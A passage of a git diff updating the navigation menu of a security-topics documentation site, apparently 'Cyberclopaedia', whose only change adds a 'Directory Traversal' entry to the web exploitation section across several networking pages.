        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -187,22 +187,6 @@

Introduction - - diff --git a/docs/Networking/The TCP-IP Suite and the OSI Model/(1) The Physical Layer.html b/docs/Networking/The TCP-IP Suite and the OSI Model/(1) The Physical Layer.html index 43db3352..c283c07b 100644 --- a/docs/Networking/The TCP-IP Suite and the OSI Model/(1) The Physical Layer.html +++ b/docs/Networking/The TCP-IP Suite and the OSI Model/(1) The Physical Layer.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -274,22 +274,6 @@

Outdoor Bridge< - - diff --git a/docs/Networking/The TCP-IP Suite and the OSI Model/(2) The Datalink Layer.html b/docs/Networking/The TCP-IP Suite and the OSI Model/(2) The Datalink Layer.html index 0d0f5090..0d3a943a 100644 --- a/docs/Networking/The TCP-IP Suite and the OSI Model/(2) The Datalink Layer.html +++ b/docs/Networking/The TCP-IP Suite and the OSI Model/(2) The Datalink Layer.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -181,22 +181,6 @@

MAC Addresses - - diff --git a/docs/Networking/The TCP-IP Suite and the OSI Model/index.html b/docs/Networking/The TCP-IP Suite and the OSI Model/index.html index b79e8a95..fa06d77f 100644 --- a/docs/Networking/The TCP-IP Suite and the OSI Model/index.html +++ b/docs/Networking/The TCP-IP Suite and the OSI Model/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
